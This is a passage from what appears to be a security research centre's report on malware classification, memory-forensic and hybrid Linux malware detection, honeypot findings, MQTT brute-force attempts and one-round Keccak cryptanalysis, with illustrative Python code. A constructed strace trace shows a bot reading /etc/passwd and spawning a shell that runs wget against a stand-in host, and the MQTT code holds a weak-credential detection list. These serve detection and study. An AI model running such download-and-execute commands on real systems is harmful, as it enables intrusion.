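        print(f"{t:17s} {scores[t]}")
```

On the constructed rows TrojanDownloader gets an accuracy of 0.875 with only half of its samples recognised, which is why recall is worth reporting next to the accuracy and FPR columns of Table 7.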

Table 7: The Accuracy and False Positive Rate Scores of Our Classifier

Type               Accuracy   FPR
Worms              78.30%     0.008
Virus              73.79%     0.065
Trojan             61.85%     0.166
TrojanDropper      91.98%     0.02
TrojanDownloader   34.55%     0.101
Backdoor           69.31%     0.013

Table 7 shows the accuracy for each type. TrojanDownloader performed relatively poorly compared with the other types, but since the classifier places those samples in the parent type (Trojan), it still seems effective.


Improvement over our Past Results

In our earlier work on malware detection, no classification was performed during detection. That work used a hybrid approach with features from both static and dynamic analysis. Static features included COFF file header and Optional header attributes, histograms of string lengths, and an entropy-based feature for packed malware. Dynamic features included file system, mutex and registry related features. The dataset was also smaller (about 12587 malware and 1800 benign samples), which the recent work improves upon, since we have collected a much larger set of malware in the recent past. Although we achieved a detection accuracy of 98.62%, we did not classify malware into types and families.
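The static features named above (COFF and optional header attributes, string-length histogram, entropy-based packing indicator), as an added example that is not the C3i feature extractor. It parses a PE image with struct and operates on a constructed two-section PE32 built in build_sample_pe(); the section name UPX1 and the random payload are constructed for the example, not taken from any real sample.

```python
"""Static PE header features: COFF header, optional header, per-section entropy
as a packing indicator, and a printable-string length histogram. Added example,
not the C3i feature extractor. It runs on a constructed two-section PE32 image
built in build_sample_pe(); the UPX1 section name and its random payload are
constructed, not a real sample."""
import math
import random
import re
import struct
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: near 0 for padding, close to 8 for packed/encrypted data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(blob: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, n_sections, _ts, _symtab, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", blob, opt)[0]
    pe32plus = magic == 0x20B
    entry = struct.unpack_from("<I", blob, opt + 16)[0]
    image_base = (struct.unpack_from("<Q", blob, opt + 24)[0] if pe32plus
                  else struct.unpack_from("<I", blob, opt + 28)[0])
    subsystem, dll_chars = struct.unpack_from("<HH", blob, opt + 68)   # same offset for PE32/PE32+
    sections = []
    for i in range(n_sections):
        off = opt + opt_size + 40 * i
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", blob, off)
        sec_chars = struct.unpack_from("<I", blob, off + 36)[0]
        raw = blob[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "raw_size": raw_size,
                         "entropy": round(shannon_entropy(raw), 3), "characteristics": sec_chars})
    return {"machine": machine, "n_sections": n_sections, "characteristics": chars,
            "pe32plus": pe32plus, "entry_point": entry, "image_base": image_base,
            "subsystem": subsystem, "dll_characteristics": dll_chars, "sections": sections}


def packed_sections(pe: dict, threshold: float = 7.0) -> list:
    """Sections whose entropy exceeds the threshold: the entropy-based packing feature."""
    return [s["name"] for s in pe["sections"] if s["entropy"] > threshold]


def string_length_histogram(blob: bytes, edges=(4, 8, 16, 32, 64)) -> dict:
    """Count printable-ASCII strings (>= 4 chars) per length bucket."""
    lengths = [len(m) for m in re.findall(rb"[\x20-\x7e]{4,}", blob)]
    hist = {}
    for lo, hi in zip(edges, edges[1:] + (None,)):
        key = f"{lo}-{hi - 1}" if hi else f"{lo}+"
        hist[key] = sum(1 for n in lengths if n >= lo and (hi is None or n < hi))
    return hist


def build_sample_pe() -> bytes:
    """Constructed PE32: a low-entropy .text plus a high-entropy section named UPX1."""
    rng = random.Random(1)
    text = (b"ExampleApp string table\0" * 8).ljust(0x200, b"\x90")
    upx1 = bytes(rng.getrandbits(8) for _ in range(0x1000))
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)     # i386, 2 sections, EXE|32BIT
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                              # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2000)                            # entry point inside UPX1
    struct.pack_into("<I", opt, 28, 0x400000)                          # ImageBase
    struct.pack_into("<HH", opt, 68, 2, 0x8140)                        # GUI; DYNAMIC_BASE|NX_COMPAT|TS_AWARE
    struct.pack_into("<I", opt, 92, 16)                                # NumberOfRvaAndSizes

    def section(name, vaddr, raw, ptr, sec_chars):
        return struct.pack("<8sIIIIIIHHI", name, len(raw), vaddr, len(raw), ptr, 0, 0, 0, 0, sec_chars)

    headers = (dos + b"PE\0\0" + coff + bytes(opt)
               + section(b".text", 0x1000, text, 0x200, 0x60000020)
               + section(b"UPX1", 0x2000, upx1, 0x400, 0xE0000040))
    return headers.ljust(0x200, b"\0") + text + upx1    # .text at 0x200, UPX1 at 0x400


def extract_features(blob: bytes) -> dict:
    """Flat feature dict of the kind a classifier would consume."""
    pe = parse_pe(blob)
    return {"machine": pe["machine"], "n_sections": pe["n_sections"],
            "entry_point": pe["entry_point"], "subsystem": pe["subsystem"],
            "dll_characteristics": pe["dll_characteristics"],
            "max_section_entropy": max(s["entropy"] for s in pe["sections"]),
            "packed_sections": packed_sections(pe),
            "string_lengths": string_length_histogram(blob)}


if __name__ == "__main__":
    print(extract_features(build_sample_pe()))
```

The entry point landing in the high-entropy section is the classic packer signature; the histogram shows the other side of packing, a near-empty set of readable strings outside the unpacking stub.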

In another related work, we attempted to classify malware into classes. There we converted the malicious executables to image files and used ResNet and other CNN models to perform the classification, achieving an accuracy of 98.22% on a larger dataset of 44935 samples comprising both Win32 and Win64 executables. The most recent work reported here classifies into a larger number of malware classes: we can now classify the types Virtool and Password Stealer (PWS), which were not included in the previous dataset. Also, the earlier work made no attempt at zero-day malware classification.

Currently we are combining these classification and detection models into a single framework: a set of tools for detection and classification to which any malware found can be submitted simultaneously, with the results combined to give better accuracy.

AUTOMATIC MALWARE DETECTION USING MEMORY FORENSICS

Detecting malware when a new binary is downloaded, i.e. distinguishing it from benign software, is an important part of computer security. Researchers have proposed various techniques using both static and dynamic analysis to detect malware, but malware authors keep improving their evasion capability with non-persistent, volatile payloads that operate only in memory. They also use obfuscation to make reverse engineering of the binary harder. Malware analysis is therefore no longer limited to static and dynamic analysis; researchers are investigating other approaches to separate malware from benign software more effectively.

Memory forensics gives a comprehensive view of the actions of a malicious executable. In this work we therefore analyze binaries for 32-bit Windows using memory forensics on generated memory dumps to detect malware effectively, as shown in Figure 12. To capture the typical behavior of malware we take the memory dumps at fixed intervals.

The memory dumps are generated by the Cuckoo sandbox, and features such as registry bindings, suspicious DLLs, hidden processes, orphan threads, code injection, injected DLLs and file system activity are extracted from each of them. For malware detection we selected the features for the classifier models by information gain. The selected features were used to train XGBoost, KNN and Decision Tree classifiers with k-fold cross-validation, so that the reported accuracy is not inflated by over-fitting. The XGBoost classifier performed best, detecting malware with 99.09% accuracy.
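Information-gain feature selection as used above, shown on constructed memory-dump indicators; this is an added example, not the C3i selection code. The indicator names follow the feature list in the text; the eight dumps and their labels are made up so that the ranking can be checked by hand.

```python
"""Information-gain ranking of memory-forensic indicators, as an added example
(not the C3i feature-selection code). Each row is one constructed memory dump
summarised as boolean indicators of the kind listed in the text; labels mark
whether the dump came from a malware run."""
import math
from collections import Counter


def entropy(labels):
    """Shannon entropy H(Y) of a label list, in bits."""
    n = len(labels)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(labels).values())


def information_gain(rows, labels, feature):
    """IG(Y; X) = H(Y) - sum_v P(X = v) * H(Y | X = v) for a discrete feature X."""
    groups = {}
    for row, y in zip(rows, labels):
        groups.setdefault(row[feature], []).append(y)
    n = len(labels)
    conditional = sum(len(g) / n * entropy(g) for g in groups.values())
    return entropy(labels) - conditional


def rank_features(rows, labels):
    """All features sorted by information gain, highest first (stable on ties)."""
    gains = [(f, round(information_gain(rows, labels, f), 4)) for f in rows[0]]
    return sorted(gains, key=lambda fg: -fg[1])


def select_top(rows, labels, n):
    """Keep only the n most informative features in every row."""
    keep = [f for f, _ in rank_features(rows, labels)[:n]]
    return [{f: row[f] for f in keep} for row in rows], keep


# Constructed dumps: indicators from a cross-view pass over each memory dump.
DUMPS = [
    {"hidden_process": 1, "injected_dll": 1, "orphan_thread": 0, "autorun_key": 1},  # malware
    {"hidden_process": 1, "injected_dll": 1, "orphan_thread": 1, "autorun_key": 0},  # malware
    {"hidden_process": 1, "injected_dll": 0, "orphan_thread": 1, "autorun_key": 1},  # malware
    {"hidden_process": 1, "injected_dll": 1, "orphan_thread": 0, "autorun_key": 0},  # malware
    {"hidden_process": 0, "injected_dll": 0, "orphan_thread": 0, "autorun_key": 1},  # benign
    {"hidden_process": 0, "injected_dll": 0, "orphan_thread": 1, "autorun_key": 0},  # benign
    {"hidden_process": 0, "injected_dll": 1, "orphan_thread": 0, "autorun_key": 1},  # benign
    {"hidden_process": 0, "injected_dll": 0, "orphan_thread": 1, "autorun_key": 0},  # benign
]
LABELS = ["malware"] * 4 + ["benign"] * 4

if __name__ == "__main__":
    for feature, gain in rank_features(DUMPS, LABELS):
        print(f"{feature:16s} IG={gain}")
```

With a balanced 4/4 label split, H(Y) is exactly 1 bit: a feature that separates the classes perfectly scores 1.0, a feature split evenly across both classes scores 0.0, and injected_dll (three of four positives are malware) lands in between at about 0.19.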

We compared our work with that of other researchers (R. Mosli et al., Chathuranga Rathnayaka et al. and M. Aghaeikheirabady et al.) and found that our approach outperformed theirs, as shown in Table 8. The comparison is across different datasets and sample counts, so the accuracies are indicative rather than measured on a common benchmark.

Table 8: Comparison of our work with other researchers' work.

Authors                          Accuracy   Samples used                Features used
R. Mosli et al.                  96%        400 malware, 100 benign     Registry keys, DLLs, API
Chathuranga Rathnayaka et al.    90%        200 malware, 200 benign     Kernel memory, kernel objects, registry, API, strings, file system
M. Aghaeikheirabady et al.       98%        350 malware, 200 benign     Registry changes, function calls, etc.
Our approach                     99.09%     1730 malware, 1571 benign   259 features: registry, suspicious DLLs, process dump, kernel dump, code injection, file system, etc.

Figure 12: Process of detecting malware by using memory forensic.

In future we will work to reduce the false positive rate of the detector toward zero. The current work takes a memory dump of the system every 10 seconds and therefore produces a huge amount of data; we will reduce the number of memory dumps that have to be parsed per sample. A dump could be taken only when malicious activity is recorded in the guest machine, such as an abnormal increase in CPU usage, unexpected registry access or an increase in network traffic, which would reduce the volume of memory dumps to parse. The work can be extended into a tool for Windows that continuously monitors the system and, whenever malicious activity is observed in memory, informs the user which process may be harming the computer.


LINUX MALWARE DETECTION BY HYBRID ANALYSIS

Over the past two decades the cyber-security research community has concentrated on detecting malicious programs for Windows. The recent exponential growth in popularity of IoT (Internet of Things) devices, however, is changing the malware landscape rapidly. This so-called 'IoT revolution' has drawn the interest of malware authors and led to exponential growth in Linux malware, which is becoming a serious threat to data privacy as well as to expensive computing resources. Manual malware analysis is not effective at this volume. Furthermore, malware authors use various obfuscation techniques to impede detection by traditional signature-based anti-virus systems. Automated yet robust malware analysis is therefore much needed.

As seen in the earlier sections, both static and dynamic analysis have limitations. Static analysis can be thwarted once encryption or packing is used, while dynamic analysis suffers from low code coverage. The two are complementary: dynamic analysis gives insight when static analysis is thwarted by obfuscation, and static analysis covers the whole executable when dynamic analysis misses code paths. Malware authors use packers, obfuscation and polymorphism/metamorphism to bypass file-format and signature-based analysis, and they can make the malware perform random actions (accessing random files, issuing random system calls, etc.) to confuse dynamic analysis. Bypassing both techniques at once is harder for them. In this work we develop a hybrid approach that integrates static and dynamic features of a sample to detect it efficiently, as shown in Figure 13. We performed static and dynamic analysis on 7717 malware and 2265 benign files, extracted the static and dynamic features separately, and combined them to train KNN, Decision Tree and Random Forest classifiers. Among these, Random Forest performed best with a detection accuracy of 99.14%.
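An added example (not the C3i pipeline) of building the hybrid feature vector described above for one Linux sample: the static part parses the ELF64 header and turns inconsistencies such as a section table offset past the end of the file into features rather than rejecting the sample, and the dynamic part counts system calls and shell spawns in strace-style output. The ELF image and the trace are constructed for the example; 192.0.2.10 is a documentation address.

```python
"""Hybrid (static + dynamic) feature vector for a Linux ELF sample, as an added
example; it is not the C3i pipeline. The static part parses the ELF64 header and
flags inconsistencies, so a forged or stripped header becomes a feature instead
of a reason to drop the sample. The dynamic part counts system calls and shell
spawns in strace-style lines. Both the ELF image and the trace are constructed."""
import re
import struct
from collections import Counter

ELF64_HEADER = "<HHIQQQIHHHHHH"   # fields after the 16-byte e_ident
SYSCALLS = ("execve", "open", "openat", "socket", "connect", "ptrace", "chmod", "unlink")
ANOMALIES = ("bad_ehsize", "shoff_beyond_eof", "no_section_headers", "phoff_beyond_eof", "unusual_e_type")


def parse_elf_header(blob: bytes) -> dict:
    if blob[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if blob[4] != 2:
        raise ValueError("example handles ELFCLASS64 only")
    names = ("e_type", "e_machine", "e_version", "e_entry", "e_phoff", "e_shoff", "e_flags",
             "e_ehsize", "e_phentsize", "e_phnum", "e_shentsize", "e_shnum", "e_shstrndx")
    hdr = dict(zip(names, struct.unpack_from(ELF64_HEADER, blob, 16)))
    hdr["ei_osabi"] = blob[7]
    return hdr


def header_anomalies(hdr: dict, file_size: int) -> list:
    """Consistency checks that a purely static pipeline would trip over."""
    issues = []
    if hdr["e_ehsize"] != 64:
        issues.append("bad_ehsize")
    if hdr["e_shnum"] and hdr["e_shoff"] + hdr["e_shnum"] * hdr["e_shentsize"] > file_size:
        issues.append("shoff_beyond_eof")       # section table points outside the file
    if hdr["e_shnum"] == 0:
        issues.append("no_section_headers")     # stripped, common for packed samples
    if hdr["e_phnum"] and hdr["e_phoff"] + hdr["e_phnum"] * hdr["e_phentsize"] > file_size:
        issues.append("phoff_beyond_eof")
    if hdr["e_type"] not in (2, 3):             # ET_EXEC, ET_DYN
        issues.append("unusual_e_type")
    return issues


def dynamic_features(trace: str) -> Counter:
    """Count selected syscalls and shell invocations in strace-like output."""
    feats = Counter()
    for line in trace.splitlines():
        m = re.match(r"^(\w+)\(", line)
        if not m:
            continue
        name = m.group(1)
        if name in SYSCALLS:
            feats["sys_" + name] += 1
        if name == "execve" and re.search(r'execve\("/bin/(ba)?sh"', line):
            feats["shell_spawn"] += 1
    return feats


def hybrid_vector(blob: bytes, trace: str) -> dict:
    """Fixed-layout vector: header fields, header anomaly flags, syscall counts."""
    hdr = parse_elf_header(blob)
    vec = {"e_type": hdr["e_type"], "e_machine": hdr["e_machine"],
           "e_shnum": hdr["e_shnum"], "e_phnum": hdr["e_phnum"]}
    found = set(header_anomalies(hdr, len(blob)))
    for issue in ANOMALIES:
        vec["hdr_" + issue] = int(issue in found)
    for name in SYSCALLS:
        vec["sys_" + name] = 0
    vec["shell_spawn"] = 0
    vec.update(dynamic_features(trace))
    return vec


def build_sample_elf() -> bytes:
    """Constructed ELF64 x86-64 executable whose section table offset lies past the end."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8        # 64-bit, little-endian, SYSV
    body = struct.pack(ELF64_HEADER, 2, 0x3E, 1, 0x401000, 64, 0x7FFF0000, 0, 64, 56, 1, 64, 3, 2)
    phdr = struct.pack("<IIQQQQQQ", 1, 5, 0, 0x400000, 0x400000, 0x100, 0x100, 0x1000)  # PT_LOAD r-x
    return ident + body + phdr + b"\x90" * 136


# Constructed strace-style trace of an IRC-style bot: connect out, read passwd, spawn a shell.
SAMPLE_TRACE = """execve("/tmp/.x", ["/tmp/.x"], 0x7ffc0d5e0a40) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(6667), sin_addr=inet_addr("192.0.2.10")}, 16) = 0
open("/etc/passwd", O_RDONLY) = 4
chmod("/tmp/.x", 0755) = 0
execve("/bin/sh", ["sh", "-c", "wget http://192.0.2.10/a.sh"], 0x7ffc0d5e0a40) = 0
connect(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("192.0.2.10")}, 16) = 0
"""

if __name__ == "__main__":
    print(hybrid_vector(build_sample_elf(), SAMPLE_TRACE))
```

Keeping the anomaly flags as features is the practical answer to the forged-header problem noted for the purely static approach below: a header that lies is itself evidence, and the dynamic columns still describe what the sample did.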

Table 9: Comparison of our work with other researchers' work.

Authors                          Features    Accuracy   Dataset                      Type of features
Shahzad et al.                   383         99%        709 benign, 709 malware      Static: ELF structure
Jinrong et al.                   100         98%        756 benign, 763 malware      Static: symbol table
Shahzad et al. (another work)    16          96%        105 benign, 114 malware      Dynamic: process control block
Ours                             115 + 260   99.14%     2265 benign, 7717 malware    Static: ELF header + strings; Dynamic: system calls + file system + shell commands

Table 9 compares the accuracy attained by other works, which were obtained on very small datasets. In this work we used a large corpus of both malware and benign files to make the model robust. Shahzad et al. analyzed fields of the static ELF structure with 99% detection accuracy, but since their approach is purely static they had to reject samples with forged headers. Ashmita et al. used a dynamic approach analyzing system calls and obtained a detection accuracy of 99.40%, but their dataset had only 226 malware samples and very few features. Our model achieves a comparable average detection accuracy of 99.14%, and the size of our dataset compares well with the other works (Table 9), which makes the model more robust.

The prior work compared here used fewer than 1000 malware samples each, so the accuracy figures they report are not fully validated. Our work improves on it in two ways: a substantially larger dataset, and hybrid analysis based on both static and dynamic features.

This work focuses on the ELF file format, but Linux malware also comes as Perl, Python, shell, Bash and PHP scripts. In future we will add modules for these to our model to build a more comprehensive anti-malware system.

Figure 13: The process to detect malware by hybrid analysis

DEVELOPMENT OF HONEYPOTS FOR THREAT INTELLIGENCE

• We deployed honeypots for services such as SSH, FTP, SMB, Telnet, web, web SQL injection (SQLi), CWMP and databases.

• Honeypots were deployed at different geographical locations (San Francisco, London, Toronto, India, France and New York) for more than a month. Collectively they received a total of 57075 attacks.

• HoneySMB was deployed for around 25 days and received a total of 1147 attacks from 867 unique IPs. It downloaded 21 different malicious files, of which 13 target Windows and the remainder target Linux.

Table 10: Unique IPs in Percentage attacking various Service Honeypots

Protocol    Unique attacking IPs (%)
Telnet      25.06
SSH         20.52
WEB-SQLi    16.32
Web         5.61
SMB         6.31
CWMP        9.33
FTP         7.63
DB          9.18


Figure 14: A sample of Analytics on the attacks found on IIT Kanpur Network by our Honeypots

• HoneyWEB-SQLi was deployed for around one month at various locations in the world with a cloned copy of the www.cse.iitk.ac.in website. It received around 3682 attacks from 771 different IPs. Attack types observed on this honeypot include shell requests, beast attacks, phpMyAdmin interface exploits, scanners and crawlers, malformed requests and DNS attacks.

• HoneyDB was deployed over a period of 25 days in various countries. It was run under two scenarios with different usernames and passwords and obtained a total of 18435 attacks from 1261 unique IPs. In scenario 1 (username and password both 'admin') only 1561 connection requests came in, and only 3 IPs managed to do anything with the database. In scenario 2 (username and password both 'root') 12290 connection requests came in, many attacks were observed, and 4 of them were able to create a new user as a backdoor.

References

HoneyFARM: https://github.com/r0hi7/HoneySSH
Augmented SSH client: https://github.com/r0hi7/ssh4honeypot
HoneyFTP: https://github.com/nishitm/HoneyFTP
HoneyWEB: https://github.com/r0hi7/HoneyWEB

IOT HONEYPOTS DEPLOYED

• We targeted the MQTT protocol (a publish/subscribe protocol commonly used by IoT devices), for which several CVEs (Common Vulnerabilities and Exposures) were published in 2017.

• We placed an MQTT broker inside the SSH honeypot and made it interact with simulated IoT devices.

• The honeypots were deployed on cloud servers in different locations (India, Amsterdam and Canada) for more than a month and received attacks from a total of 2576 unique hosts.

• The username 'root' with password 'root' was the most common credential pair in the CONNECT packets sent in attempts to brute-force the MQTT broker.

• CONNECT packet flooding, SYN flooding, privilege escalation by setting the client id to '#', and tampering with IoT device data by publishing to the topics the devices were subscribed to were among the common attacks observed.
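An added example, not the honeypot code, of decoding the MQTT 3.1.1 CONNECT packet that carries the credentials and client id mentioned above, and of flagging the two patterns the honeypots recorded: weak credential pairs such as root/root and a client id of '#'. Both packets are constructed here with build_connect(); the weak-credential list is an assumed starting set, not one taken from the report.

```python
"""Decoder for MQTT 3.1.1 CONNECT packets, the packet an attacker sends when
brute-forcing a broker. Added example, not the honeypot code; the sample packets
are constructed here. It extracts client id, username and password and flags
weak credential pairs and a client id containing the '#' wildcard."""
import struct

# Assumed starting list of weak pairs; the report only names root/root as the most common.
WEAK_CREDENTIALS = {("root", "root"), ("admin", "admin"), ("admin", "password"), ("guest", "guest")}


def _encode_remaining_length(n: int) -> bytes:
    """MQTT variable-length integer: 7 bits per byte, high bit = continuation."""
    out = bytearray()
    while True:
        byte, n = n % 128, n // 128
        if n:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)


def _decode_remaining_length(buf: bytes, pos: int):
    value, multiplier = 0, 1
    while True:
        byte = buf[pos]
        pos += 1
        value += (byte & 0x7F) * multiplier
        if not byte & 0x80:
            return value, pos
        multiplier *= 128
        if multiplier > 128 ** 3:
            raise ValueError("malformed remaining length")


def _field(buf: bytes, pos: int):
    """UTF-8 string prefixed by a 2-byte big-endian length."""
    (n,) = struct.unpack_from(">H", buf, pos)
    return buf[pos + 2:pos + 2 + n].decode("utf-8"), pos + 2 + n


def build_connect(client_id: str, username=None, password=None, keep_alive=60) -> bytes:
    """Build a CONNECT packet (clean session, no will) the way a client would."""
    flags = 0x02
    payload = struct.pack(">H", len(client_id)) + client_id.encode()
    if username is not None:
        flags |= 0x80
        payload += struct.pack(">H", len(username)) + username.encode()
    if password is not None:
        flags |= 0x40
        payload += struct.pack(">H", len(password)) + password.encode()
    variable = struct.pack(">H", 4) + b"MQTT" + bytes([4, flags]) + struct.pack(">H", keep_alive)
    body = variable + payload
    return b"\x10" + _encode_remaining_length(len(body)) + body


def parse_connect(packet: bytes) -> dict:
    if packet[0] >> 4 != 1:
        raise ValueError("not a CONNECT packet")
    remaining, pos = _decode_remaining_length(packet, 1)
    if len(packet) - pos != remaining:
        raise ValueError("length mismatch")
    proto, pos = _field(packet, pos)
    level, flags = packet[pos], packet[pos + 1]
    pos += 2
    keep_alive = struct.unpack_from(">H", packet, pos)[0]
    pos += 2
    client_id, pos = _field(packet, pos)
    will_topic = will_message = username = password = None
    if flags & 0x04:                       # will flag: topic and message precede the credentials
        will_topic, pos = _field(packet, pos)
        will_message, pos = _field(packet, pos)
    if flags & 0x80:
        username, pos = _field(packet, pos)
    if flags & 0x40:
        password, pos = _field(packet, pos)
    return {"protocol": proto, "level": level, "keep_alive": keep_alive, "client_id": client_id,
            "username": username, "password": password, "will_topic": will_topic,
            "will_message": will_message}


def connect_indicators(conn: dict) -> list:
    """Suspicious traits of one CONNECT, matching what the MQTT honeypots observed."""
    hits = []
    if "#" in conn["client_id"] or conn["client_id"] == "+":
        hits.append("wildcard_client_id")
    if (conn["username"], conn["password"]) in WEAK_CREDENTIALS:
        hits.append("weak_credentials")
    if conn["username"] is not None and conn["password"] is None:
        hits.append("username_without_password")
    return hits


# Constructed packets: one brute-force attempt of the kind logged, one ordinary client.
ATTACK_PACKET = build_connect("#", "root", "root")
BENIGN_PACKET = build_connect("sensor-42", "telemetry", "Xk7pq2Rb9v")

if __name__ == "__main__":
    for pkt in (ATTACK_PACKET, BENIGN_PACKET):
        conn = parse_connect(pkt)
        print(conn["client_id"], conn["username"], connect_indicators(conn))
```

The same parser can sit in front of a real broker as a pre-filter: the fixed header is one byte, so deciding whether a connection deserves the full broker state machine costs a few dozen bytes of parsing.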

Table 11: Attack Statistics from IPs belonging to various Countries on our IoT Honeypots

Country    Unique attacking hosts (%)
China      28.44
USA        26.21
Korea      5.94
Brazil     5.65
Russia     5.01
Vietnam    4.38
France     4.38
India      3.82
Others     16.17

Figure 14: Distinguishing Script Based Attacks and Manual Attacks based on inter-command Latency


References

SSH honeypot: https://github.com/shbhmsingh72/wetland
MQTT broker: https://github.com/shbhmsingh72/hbmqtt


CRYPTANALYSIS AND CRYPTO ENGINEERING

One objective of the center is to find mathematical attacks on recent hash functions, which are gaining importance due to their pervasive use in blockchains and crypto-currencies. Some interesting results obtained by researchers at the center are as follows:

Cryptanalysis of 1-Round KECCAK

KECCAK was designed by Guido Bertoni, Joan Daemen, Michaël Peeters and Gilles Van Assche. It won the NIST SHA-3 competition and in 2015 was standardized as the Secure Hash Algorithm 3 (SHA-3, FIPS 202). Because of its wide deployment, a lot of security analysis is being performed on the KECCAK hash family.

In our recent work we give the first preimage attack against the 1-round KECCAK-512 hash function; the method works for all variants of 1-round KECCAK. The only computation required is solving 384 linear equations. The attack exploits the degrees of freedom in the equations relating hash bits to message bits, converting these equations into simple assignments of values to message variables. Using this method we can find, for every hash value, a message of length less than 1024 bits, and the time complexity of the attack is constant.

The preimage attack was implemented in C++ using Victor Shoup's NTL library. The code was executed on a laptop with an Intel Core i5-7200 processor and 16GB RAM and produces a preimage in less than 0.005 seconds.

This result was presented at AFRICACRYPT 2018, held at Marrakesh, Morocco on May 7-9, 2018.
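An added example, not the AFRICACRYPT 2018 attack code: Keccak-f[1600]'s step mappings and a one-round Keccak-512 sponge in Python. It does not implement the preimage attack. It checks the structural property the linearization relies on: theta, rho and pi are GF(2)-linear (iota only adds a constant), so after a single round chi, of algebraic degree 2, is the only nonlinear step between message bits and hash bits. The sponge here absorbs a single block, which is all a message shorter than the rate needs.

```python
"""Keccak-f[1600] step mappings and a one-round Keccak-512 sponge, written as
an added illustration. This is not the attack code presented at AFRICACRYPT
2018 and it does not implement the preimage attack; it shows the structural
fact the attack rests on: theta, rho, pi and iota are GF(2)-affine, so after a
single round only chi (algebraic degree 2) stands between message bits and
hash bits."""
import random

MASK64 = (1 << 64) - 1
ROT = [[0, 36, 3, 41, 18], [1, 44, 10, 45, 2], [62, 6, 43, 15, 61],
       [28, 55, 25, 21, 56], [27, 20, 39, 8, 14]]      # rho offsets, ROT[x][y]
RC0 = 0x0000000000000001                                # iota constant of round 0
RATE_BYTES = 72                                         # Keccak-512: r = 576, c = 1024 bits


def rol64(v, n):
    n %= 64
    return ((v << n) | (v >> (64 - n))) & MASK64 if n else v


def theta(a):
    c = [a[x][0] ^ a[x][1] ^ a[x][2] ^ a[x][3] ^ a[x][4] for x in range(5)]
    d = [c[(x - 1) % 5] ^ rol64(c[(x + 1) % 5], 1) for x in range(5)]
    return [[a[x][y] ^ d[x] for y in range(5)] for x in range(5)]


def rho(a):
    return [[rol64(a[x][y], ROT[x][y]) for y in range(5)] for x in range(5)]


def pi(a):
    b = [[0] * 5 for _ in range(5)]
    for x in range(5):
        for y in range(5):
            b[y][(2 * x + 3 * y) % 5] = a[x][y]
    return b


def chi(a):
    """The only nonlinear step: a[x] ^= (~a[x+1]) & a[x+2] along each row."""
    return [[a[x][y] ^ (~a[(x + 1) % 5][y] & MASK64 & a[(x + 2) % 5][y])
             for y in range(5)] for x in range(5)]


def iota(a, rc=RC0):
    b = [row[:] for row in a]
    b[0][0] ^= rc
    return b


def keccak_round(a, rc=RC0):
    return iota(chi(pi(rho(theta(a)))), rc)


def keccak512_one_round(msg: bytes) -> bytes:
    """Absorb one padded block (pad10*1) and apply ONE round instead of 24."""
    if len(msg) >= RATE_BYTES:
        raise ValueError("single-block example: message must be shorter than the rate")
    block = bytearray(msg) + b"\x01"
    block += b"\x00" * (RATE_BYTES - len(block))
    block[-1] |= 0x80
    state = [[0] * 5 for _ in range(5)]
    for i in range(RATE_BYTES // 8):                    # lane i sits at x = i % 5, y = i // 5
        state[i % 5][i // 5] ^= int.from_bytes(block[8 * i:8 * i + 8], "little")
    state = keccak_round(state)
    return b"".join(state[i % 5][i // 5].to_bytes(8, "little") for i in range(8))


def xor_state(a, b):
    return [[a[x][y] ^ b[x][y] for y in range(5)] for x in range(5)]


def is_gf2_linear(step, trials=20, seed=7):
    """Check step(a ^ b) == step(a) ^ step(b) on random states.
    One failing pair proves the step is not GF(2)-linear."""
    rng = random.Random(seed)
    for _ in range(trials):
        a = [[rng.getrandbits(64) for _ in range(5)] for _ in range(5)]
        b = [[rng.getrandbits(64) for _ in range(5)] for _ in range(5)]
        if step(xor_state(a, b)) != xor_state(step(a), step(b)):
            return False
    return True


if __name__ == "__main__":
    for name, step in (("theta", theta), ("rho", rho), ("pi", pi), ("chi", chi)):
        print(f"{name:5s} linear over GF(2): {is_gf2_linear(step)}")
    print(keccak512_one_round(b"abc").hex())
```

With 24 rounds the composition of chi steps drives the degree up exponentially, which is why the same linearization idea does not extend to the full hash; the one-round setting is where the 512 output bits are each a quadratic function of the 576 rate bits.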

Resource Efficient Implementation Crypto-primitives in Hardware

To implement modern network protocols such as IPsec, one needs to encrypt, decrypt and hash at line speed, which calls for efficient, low-power hardware implementations of cryptographic algorithms. Below we summarize our work in this area over the last year.


VLSI ARCHITECTURES FOR CRYPTO PRIMITIVES

In this work we consider hardware implementations of a number of cryptographic primitives and present several optimizations, focused on the following areas.

